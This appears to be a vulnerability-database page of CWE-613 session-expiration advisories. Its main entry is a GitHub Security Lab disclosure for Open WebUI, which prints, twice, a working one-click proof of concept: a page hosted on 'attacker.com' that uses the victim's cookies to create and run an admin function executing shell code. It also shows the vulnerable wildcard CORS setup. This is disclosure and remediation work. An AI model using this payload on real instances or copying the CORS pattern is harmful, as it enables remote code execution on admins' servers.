Common Weakness Enumeration

CWE-613

Allowed-with-Review

Insufficient Session Expiration

Abstraction: Base · Status: Incomplete

According to WASC, "Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."

876 vulnerabilities reference this CWE, most recent first.

GHSA-6XCP-7MPR-M7WM

Vulnerability from github – Published: 2026-05-11 14:02 – Updated: 2026-05-11 14:02
VLAI
Summary
Open WebUI has a CORS misconfiguration and session validation issue
Details

GitHub Security Lab (GHSL) Vulnerability Report, open-webui: GHSL-2024-174, GHSL-2024-175

The GitHub Security Lab team has identified potential security vulnerabilities in open-webui.

We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.

If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at securitylab@github.com (please include GHSL-2024-174 or GHSL-2024-175 as a reference). See also this blog post written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.

If you are NOT the correct point of contact for this report, please let us know!

Summary

Due to a CORS misconfiguration and session validation issue, an attacker may be able to perform a 1 click attack against browsers with admin access to openwebui, resulting in remote code execution in the openwebui instance. The openwebui application runs as root in Docker container's default setup, which allows for complete compromise of the container.

Project

open-webui

Tested Version

v0.3.10

Details

Issue 1: CORS misconfiguration on multiple routers (GHSL-2024-174)

CORS misconfigurations exist on multiple routers of open-webui which results in allowing arbitrary websites to make authenticated cross site requests to openwebui. Accounts with access to the /api/v1/functions endpoint (admins) can execute arbitrary code on the openwebui instance.

The following pattern occurs at the following routers: 1. backend/apps/webui/main.py 2. backend/apps/audio/main.py 3. backend/apps/images/main.py 4. backend/apps/rag/main.py 5. backend/apps/openai/main.py 6. backend/apps/ollama/main.py 7. backend/main.py

app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

Impact

This issue may lead to Remote Code Execution.

Remediation

The FastAPI CORS middleware is not safe by default, meaning it reflects the origin when specifying allow_origins=["*"]. Remove the vulnerable, broad origin and allow users to dynamically setup the exact allowed origins via the administration panel or config file, do not allow for broad origins such as "*" or "*.com"

Proof of Concept

Host the following code on your website, attacker.com. Open the webpage using Firefox, and click on the webpage as instructed. Check your openwebui host to see the result of the command whoami placed into a newly created file /tmp/whoami.txt. Ensure you have logged into an admin open-webui account

<body>
    <p>Click here to login.</p>
    <div id="response"></div>

    <script>
      //Firefox cross site cookie request bypass
      const url = 'http://localhost:3000/static/favicon.png';
      document.addEventListener("DOMContentLoaded", () => {
        document.onclick = () => {
          open(url);
          filter_id = "okok"
//Create a function/filter to write code
fetch('http://localhost:3000/api/v1/functions/create', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    "id": filter_id,
    "name": "test2",
    "meta": {"description": "test2"},
    "content": "from pydantic import BaseModel, Field\nfrom typing import Optional\n\n\nclass Filter:\n    class Valves(BaseModel):\n        priority: int = Field(\n            default=0, description=\"Priority level for the filter operations.\"\n        )\n        max_turns: int = Field(\n            default=8, description=\"Maximum allowable conversation turns for a user.\"\n        )\n        pass\n\n    class UserValves(BaseModel):\n        max_turns: int = Field(\n            default=4, description=\"Maximum allowable conversation turns for a user.\"\n        )\n        pass\n\n    def __init__(self):\n        # Indicates custom file handling logic. This flag helps disengage default routines in favor of custom\n        # implementations, informing the WebUI to defer file-related operations to designated methods within this class.\n        # Alternatively, you can remove the files directly from the body in from the inlet hook\n        # self.file_handler = True\n\n        # Initialize 'valves' with specific configurations. Using 'Valves' instance helps encapsulate settings,\n        # which ensures settings are managed cohesively and not confused with operational flags like 'file_handler'.\n        self.valves = self.Valves()\n        f = open(\"/tmp/whoami.txt\", \"w\")\n        import subprocess\n\n        output = subprocess.getoutput(\"whoami\")\n        f.write(output)\n        f.close()\n        pass\n\n    def inlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n        return body\n\n    def outlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n        return body\n"
  }),
  credentials: 'include' // This will send cookies from the origin
})
.then(response => response.json())
.then(data => console.log(data))
.catch((error) => console.error('Error:', error)); 


//Toggle the filter to execute code
fetch(`http://localhost:3000/api/v1/functions/id/${filter_id}/toggle`, {
  method: 'POST',
  credentials: 'include' // This will send cookies from the origin
})
.then(response => response.json())
.then(data => console.log(data))
.catch((error) => console.error('Error:', error)); 
        }
      });
    </script>
  </body>

Issue 2: Failure to Invalidate Session on Logout (GHSL-2024-175)

Openwebui fails to invalidate and clear session cookies after logout. In fact, it seems to reuse the same session cookies. This allows an attacker who has access to previous session cookie details to login at a later point as long as the victim has not closed their browser.

This vulnerability is relevant to the above CORS issue because it no longer requires the user to be logged in to exploit. If the cookie had been properly invalidated/cleared, the CORS issue would only affect logged in users.

Impact

This issue may increase the impact of primitives gained from other security issues.

Remediation

For every session, new cookies should be generated. When a user logouts, the session cookies from the previous session should be invalidated and removed from the browser's storage.

Resources

OWASP Recommendation On Sessions

GitHub Security Advisories

We recommend you create a private GitHub Security Advisory for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published.

Credit

These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-174 or GHSL-2024-175 in any communication regarding these issues.

Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.33"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-613"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T14:02:04Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# GitHub Security Lab (GHSL) Vulnerability Report, open-webui: `GHSL-2024-174`, `GHSL-2024-175`\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [open-webui](https://github.com/open-webui/open-webui).\n\nWe are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.\n\nIf at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2024-174` or `GHSL-2024-175` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub\u0027s Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.\n\nIf you are _NOT_ the correct point of contact for this report, please let us know!\n\n## Summary\n\nDue to a CORS misconfiguration and session validation issue, an attacker may be able to perform a 1 click attack against browsers with admin access to openwebui, resulting in remote code execution in the openwebui instance. The openwebui application runs as root in Docker container\u0027s default setup, which allows for complete compromise of the container.\n\n## Project\n\nopen-webui\n\n## Tested Version\n\n[v0.3.10](https://github.com/open-webui/open-webui/releases/tag/v0.3.10)\n\n## Details\n\n### Issue 1: CORS misconfiguration on multiple routers (`GHSL-2024-174`)\n\nCORS misconfigurations exist on multiple routers of open-webui which results in allowing arbitrary websites to make authenticated cross site requests to openwebui. Accounts with access to the `/api/v1/functions` endpoint (admins) can execute arbitrary code on the openwebui instance. \n\nThe following pattern occurs at the following routers:\n1. [backend/apps/webui/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/webui/main.py#L92)\n2. [backend/apps/audio/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/audio/main.py#L58)\n3. [backend/apps/images/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/images/main.py#L60)\n4. [backend/apps/rag/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/rag/main.py#L246)\n5. [backend/apps/openai/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/openai/main.py#L47)\n6. [backend/apps/ollama/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/ollama/main.py#L62)\n7. [backend/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/main.py#L881)\n```python\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=[\"*\"],\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n```\n\n#### Impact\n\nThis issue may lead to `Remote Code Execution`.\n\n#### Remediation\n\nThe FastAPI CORS middleware is not safe by default, meaning it reflects the origin when specifying `allow_origins=[\"*\"]`.  Remove the vulnerable, broad origin and allow users to dynamically setup the exact allowed origins via the administration panel or config file, do not allow for broad origins such as `\"*\"` or `\"*.com\"`\n\n#### Proof of Concept\n\nHost the following code on your website, `attacker.com`. Open the webpage using Firefox, and click on the webpage as instructed. Check your openwebui host to see the result of the command `whoami` placed into a newly created file `/tmp/whoami.txt`. Ensure you have logged into an admin open-webui account \n```javascript\n\u003cbody\u003e\n    \u003cp\u003eClick here to login.\u003c/p\u003e\n    \u003cdiv id=\"response\"\u003e\u003c/div\u003e\n \n    \u003cscript\u003e\n      //Firefox cross site cookie request bypass\n      const url = \u0027http://localhost:3000/static/favicon.png\u0027;\n      document.addEventListener(\"DOMContentLoaded\", () =\u003e {\n        document.onclick = () =\u003e {\n          open(url);\n          filter_id = \"okok\"\n//Create a function/filter to write code\nfetch(\u0027http://localhost:3000/api/v1/functions/create\u0027, {\n  method: \u0027POST\u0027,\n  headers: {\n    \u0027Content-Type\u0027: \u0027application/json\u0027\n  },\n  body: JSON.stringify({\n    \"id\": filter_id,\n    \"name\": \"test2\",\n    \"meta\": {\"description\": \"test2\"},\n    \"content\": \"from pydantic import BaseModel, Field\\nfrom typing import Optional\\n\\n\\nclass Filter:\\n    class Valves(BaseModel):\\n        priority: int = Field(\\n            default=0, description=\\\"Priority level for the filter operations.\\\"\\n        )\\n        max_turns: int = Field(\\n            default=8, description=\\\"Maximum allowable conversation turns for a user.\\\"\\n        )\\n        pass\\n\\n    class UserValves(BaseModel):\\n        max_turns: int = Field(\\n            default=4, description=\\\"Maximum allowable conversation turns for a user.\\\"\\n        )\\n        pass\\n\\n    def __init__(self):\\n        # Indicates custom file handling logic. This flag helps disengage default routines in favor of custom\\n        # implementations, informing the WebUI to defer file-related operations to designated methods within this class.\\n        # Alternatively, you can remove the files directly from the body in from the inlet hook\\n        # self.file_handler = True\\n\\n        # Initialize \u0027valves\u0027 with specific configurations. Using \u0027Valves\u0027 instance helps encapsulate settings,\\n        # which ensures settings are managed cohesively and not confused with operational flags like \u0027file_handler\u0027.\\n        self.valves = self.Valves()\\n        f = open(\\\"/tmp/whoami.txt\\\", \\\"w\\\")\\n        import subprocess\\n\\n        output = subprocess.getoutput(\\\"whoami\\\")\\n        f.write(output)\\n        f.close()\\n        pass\\n\\n    def inlet(self, body: dict, __user__: Optional[dict] = None) -\u003e dict:\\n        return body\\n\\n    def outlet(self, body: dict, __user__: Optional[dict] = None) -\u003e dict:\\n        return body\\n\"\n  }),\n  credentials: \u0027include\u0027 // This will send cookies from the origin\n})\n.then(response =\u003e response.json())\n.then(data =\u003e console.log(data))\n.catch((error) =\u003e console.error(\u0027Error:\u0027, error)); \n\n\n//Toggle the filter to execute code\nfetch(`http://localhost:3000/api/v1/functions/id/${filter_id}/toggle`, {\n  method: \u0027POST\u0027,\n  credentials: \u0027include\u0027 // This will send cookies from the origin\n})\n.then(response =\u003e response.json())\n.then(data =\u003e console.log(data))\n.catch((error) =\u003e console.error(\u0027Error:\u0027, error)); \n        }\n      });\n    \u003c/script\u003e\n  \u003c/body\u003e\n```\n\n### Issue 2: Failure to Invalidate Session on Logout (`GHSL-2024-175`)\n\nOpenwebui fails to invalidate and clear session cookies after logout. In fact, it seems to reuse the same session cookies. This allows an attacker who has access to previous session cookie details to login at a later point as long as the victim has not closed their browser.\n\nThis vulnerability is relevant to the above CORS issue because it no longer requires the user to be logged in to exploit. If the cookie had been properly invalidated/cleared, the CORS issue would only affect logged in users. \n\n#### Impact\n\nThis issue may increase the impact of primitives gained from other security issues.\n\n#### Remediation\n\nFor every session, new cookies should be generated. When a user logouts, the session cookies from the previous session should be invalidated and removed from the browser\u0027s storage.\n\n#### Resources\n[OWASP Recommendation On Sessions](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)\n\n## GitHub Security Advisories\n\nWe recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).\n\n## Credit\n\nThese issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs).\n\n## Contact\n\nYou can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2024-174` or `GHSL-2024-175` in any communication regarding these issues.\n\n## Disclosure Policy\n\nThis report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).",
  "id": "GHSA-6xcp-7mpr-m7wm",
  "modified": "2026-05-11T14:02:04Z",
  "published": "2026-05-11T14:02:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-6xcp-7mpr-m7wm"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has a CORS misconfiguration and session validation issue"
}

GHSA-72PV-QVJJ-JQ58

Vulnerability from github – Published: 2025-10-26 18:30 – Updated: 2025-11-10 15:31
VLAI
Details

Logout Functionality not Working.This issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12278"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-613"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-26T17:15:52Z",
    "severity": "MODERATE"
  },
  "details": "Logout Functionality not Working.This issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5.",
  "id": "GHSA-72pv-qvjj-jq58",
  "modified": "2025-11-10T15:31:03Z",
  "published": "2025-10-26T18:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12278"
    },
    {
      "type": "WEB",
      "url": "https://azure-access.com/security-advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-73VJ-WXR6-3PQ5

Vulnerability from github – Published: 2022-05-24 16:47 – Updated: 2024-04-04 00:53
VLAI
Details

The Pivotal Ops Manager, 2.2.x versions prior to 2.2.23, 2.3.x versions prior to 2.3.16, 2.4.x versions prior to 2.4.11, and 2.5.x versions prior to 2.5.3, contain configuration that circumvents refresh token expiration. A remote authenticated user can gain access to a browser session that was supposed to have expired, and access Ops Manager resources.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-3790"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-324",
      "CWE-613"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-06-06T19:29:00Z",
    "severity": "MODERATE"
  },
  "details": "The Pivotal Ops Manager, 2.2.x versions prior to 2.2.23, 2.3.x versions prior to 2.3.16, 2.4.x versions prior to 2.4.11, and 2.5.x versions prior to 2.5.3, contain configuration that circumvents refresh token expiration. A remote authenticated user can gain access to a browser session that was supposed to have expired, and access Ops Manager resources.",
  "id": "GHSA-73vj-wxr6-3pq5",
  "modified": "2024-04-04T00:53:33Z",
  "published": "2022-05-24T16:47:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3790"
    },
    {
      "type": "WEB",
      "url": "https://pivotal.io/security/cve-2019-3790"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/108512"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7429-79P7-VGCX

Vulnerability from github – Published: 2025-10-31 00:30 – Updated: 2025-11-06 18:32
VLAI
Details

Nagios XI versions prior to 2024R1.1.3 did not invalidate all other active sessions for a user when that user's password was changed. As a result, any pre-existing sessions (including those potentially controlled by an attacker) remained valid after a credential update. This insufficient session expiration could allow continued unauthorized access to user data and actions even after a password change.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-13996"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-613"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-30T22:15:45Z",
    "severity": "CRITICAL"
  },
  "details": "Nagios XI versions prior to\u00a02024R1.1.3\u00a0did not invalidate all other active sessions for a user when that user\u0027s password was changed. As a result, any pre-existing sessions (including those potentially controlled by an attacker) remained valid after a credential update. This insufficient session expiration could allow continued unauthorized access to user data and actions even after a password change.",
  "id": "GHSA-7429-79p7-vgcx",
  "modified": "2025-11-06T18:32:47Z",
  "published": "2025-10-31T00:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13996"
    },
    {
      "type": "WEB",
      "url": "https://www.nagios.com/changelog/nagios-xi"
    },
    {
      "type": "WEB",
      "url": "https://www.nagios.com/products/security/#nagios-xi"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/nagios-xi-session-not-invalidated-after-password-change"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-742J-JCFR-23W3

Vulnerability from github – Published: 2022-05-13 01:01 – Updated: 2022-06-29 14:08
VLAI
Summary
Insufficient Session Expiration in Jenkins
Details

Users who cached their CLI authentication before Jenkins was updated to 2.150.2 and newer, or 2.160 and newer, would remain authenticated in Jenkins 2.171 and earlier and Jenkins LTS 2.164.1 and earlier, because the fix for CVE-2019-1003004 in these releases did not reject existing remoting-based CLI authentication caches.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.164.1"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.main:jenkins-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.164.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.171"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.main:jenkins-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.165"
            },
            {
              "fixed": "2.172"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-1003049"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-613"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-29T14:08:39Z",
    "nvd_published_at": "2019-04-10T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "Users who cached their CLI authentication before Jenkins was updated to 2.150.2 and newer, or 2.160 and newer, would remain authenticated in Jenkins 2.171 and earlier and Jenkins LTS 2.164.1 and earlier, because the fix for CVE-2019-1003004 in these releases did not reject existing remoting-based CLI authentication caches.",
  "id": "GHSA-742j-jcfr-23w3",
  "modified": "2022-06-29T14:08:39Z",
  "published": "2022-05-13T01:01:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003049"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/jenkins/commit/0eeaa087aac192fb39f52928be5a5bbf16627ea6"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2019:1605"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/jenkins"
    },
    {
      "type": "WEB",
      "url": "https://jenkins.io/security/advisory/2019-04-10/#SECURITY-1289"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/107901"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Insufficient Session Expiration in Jenkins"
}

GHSA-74XH-52QM-QF5R

Vulnerability from github – Published: 2022-05-24 16:47 – Updated: 2024-04-04 00:53
VLAI
Details

Progress Sitefinity 10.1.6536 does not invalidate session cookies upon logouts. It instead tries to overwrite the cookie in the browser, but it remains valid on the server side. This means the cookie can be reused to maintain access to the account, even if the account credentials and permissions are changed.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-7215"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-613"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-06-06T17:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Progress Sitefinity 10.1.6536 does not invalidate session cookies upon logouts. It instead tries to overwrite the cookie in the browser, but it remains valid on the server side. This means the cookie can be reused to maintain access to the account, even if the account credentials and permissions are changed.",
  "id": "GHSA-74xh-52qm-qf5r",
  "modified": "2024-04-04T00:53:44Z",
  "published": "2022-05-24T16:47:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7215"
    },
    {
      "type": "WEB",
      "url": "https://knowledgebase.progress.com/#sort=relevancy\u0026f:%40objecttypelabel=%5BProduct%20Alert%5D"
    },
    {
      "type": "WEB",
      "url": "https://knowledgebase.progress.com/#sort=relevancy\u0026f:@objecttypelabel=[Product%20Alert]"
    },
    {
      "type": "WEB",
      "url": "https://knowledgebase.progress.com/articles/Article/Security-Advisory-For-Resolving-Security-Vulnerabilities-May-2019"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7547-299X-4PMV

Vulnerability from github – Published: 2022-01-11 00:00 – Updated: 2022-01-20 00:02
VLAI
Details

Improper session management vulnerability in Samsung Health prior to 6.20.1.005 prevents logging out from Samsung Health App.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-22283"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-613"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-10T14:12:00Z",
    "severity": "LOW"
  },
  "details": "Improper session management vulnerability in Samsung Health prior to 6.20.1.005 prevents logging out from Samsung Health App.",
  "id": "GHSA-7547-299x-4pmv",
  "modified": "2022-01-20T00:02:52Z",
  "published": "2022-01-11T00:00:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22283"
    },
    {
      "type": "WEB",
      "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2022\u0026month=1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-757P-7HP5-PQMR

Vulnerability from github – Published: 2023-07-06 21:14 – Updated: 2023-07-06 23:13
VLAI
Summary
Apache InLong Insufficient Session Expiration vulnerability
Details

Insufficient Session Expiration vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0. 

An old session can be used by an attacker even after the user has been deleted or the password has been changed.

Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 or https://github.com/apache/inlong/pull/7884 to solve it.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.inlong:manager-pojo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.4.0"
            },
            {
              "fixed": "1.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.inlong:manager-dao"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.4.0"
            },
            {
              "fixed": "1.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.inlong:manager-web"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.4.0"
            },
            {
              "fixed": "1.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.inlong:manager-service"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.4.0"
            },
            {
              "fixed": "1.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-31065"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-613"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-06T23:13:58Z",
    "nvd_published_at": "2023-05-22T16:15:10Z",
    "severity": "CRITICAL"
  },
  "details": "Insufficient Session Expiration vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0.\u00a0\n\nAn old session can be used by an attacker even after the user has been deleted or the password has been changed.\n\nUsers are advised to upgrade to Apache InLong\u0027s 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 or  https://github.com/apache/inlong/pull/7884 to solve it.",
  "id": "GHSA-757p-7hp5-pqmr",
  "modified": "2023-07-06T23:13:58Z",
  "published": "2023-07-06T21:14:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31065"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/inlong/pull/7836"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/inlong/pull/7884"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/inlong"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/to7o0n2cks0omtwo6mhh5cs2vfdbplqf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache InLong Insufficient Session Expiration vulnerability"
}

GHSA-76F5-R74W-9H63

Vulnerability from github – Published: 2024-11-12 15:30 – Updated: 2024-11-12 15:30
VLAI
Details

A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 3). The affected application does not properly invalidate sessions when the associated user is deleted or disabled or their permissions are modified. This could allow an authenticated attacker to continue performing malicious actions even after their user account has been disabled.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-46892"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-613"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-12T13:15:09Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been identified in SINEC INS (All versions \u003c V1.0 SP2 Update 3). The affected application does not properly invalidate sessions when the associated user is deleted or disabled or their permissions are modified. This could allow an authenticated attacker to continue performing malicious actions even after their user account has been disabled.",
  "id": "GHSA-76f5-r74w-9h63",
  "modified": "2024-11-12T15:30:42Z",
  "published": "2024-11-12T15:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46892"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-915275.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-77MJ-XGFX-FXP2

Vulnerability from github – Published: 2026-03-04 18:31 – Updated: 2026-03-05 15:30
VLAI
Details

